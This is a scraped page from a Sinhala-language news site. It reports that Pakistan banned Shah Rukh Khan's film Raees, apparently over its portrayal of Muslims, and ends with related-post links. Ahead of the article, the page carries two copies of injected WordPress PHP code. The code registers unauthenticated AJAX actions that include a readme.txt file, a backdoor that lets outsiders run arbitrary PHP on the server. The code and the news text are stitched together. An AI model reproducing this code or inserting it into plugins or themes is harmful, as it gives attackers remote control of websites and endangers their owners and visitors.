if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } ෂාරුක් ඛාන්ගේ Raees චිත්‍රපටයට තහනමක් - mediahumanrights.lk
mediahumanrights.lk
Entertainment Entertainment News News

ෂාරුක් ඛාන්ගේ Raees චිත්‍රපටයට තහනමක්

සුපිරි බොලිවුඩ් නළු ෂාරුක් ඛාන්ගේ නවතම චිත්‍රපටය වන Raees පාකිස්ථානය තුල ප්‍රදර්ශනය කිරීම තහනම් කිරීමට පාකිස්ථාන බලධාරීන් තීරණය කර තිබෙනවා.
මෙම චිත්‍රපටය පාකිස්ථානය තුල ප්‍රදර්ශනය කිරීම වැළැක්වීමට හේතු දැක්වීමක් පාකිස්තානයේ රැඟුම් පාලක මණ්ඩලය විසින් සිදුකර නොමැති බවයි විදෙස් මාධ්‍ය වාර්තා කරන්නේ.
වෙනස්ම තේමාවක් යටතේ නිර්මාණය වූ Raees චිත්‍රපටය තුල මුස්ලිම්වරුන් ත්‍රස්තවාදීන් ලෙස පෙන්වා දීම හේතුවෙන් මෙම වාරණය නිකුත් කර අති බව සදහන්.
පසුගිය 02වනදා Raees චිත්‍රපටය පකිස්ථානය තුල ප්‍රදර්ශනය අාරම්භ වීමට නියමිතව තිබුණා.
චිත්‍රපටයේ පුර්ව ප්‍රචාරක පටය පහතින්.

Related posts

බොලිවුඩ් නළු අමීර් ඛාන් සිනමාවෙන් අභ්‍යාවකාශයට

Shiran Viraj

ගෝටා දිනවන්න ජනපති මෛත‍්‍රී ජනාධිපතිවරණ වේදිකාවට..

Shiran Viraj

රටම ලොක්ඩවුන් තත්වයක් ආසන්නයේ..

Shiran Viraj